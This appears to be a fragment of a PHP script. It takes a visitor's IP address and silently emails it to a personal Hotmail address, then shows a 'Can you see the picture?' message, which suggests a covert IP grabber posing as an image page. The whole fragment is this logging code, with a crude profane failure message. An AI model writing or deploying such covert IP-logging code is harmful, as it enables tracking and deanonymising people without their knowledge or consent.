$ipAddress = "$REMOTE_ADDR"; $message="$ipAddress"; if(mail('simplyskate@hotmail.com',"IP Address",$message)) { echo "Can you see the picture?"; } else { echo "Aw im being a cunt again and im not going to work!"; } ?>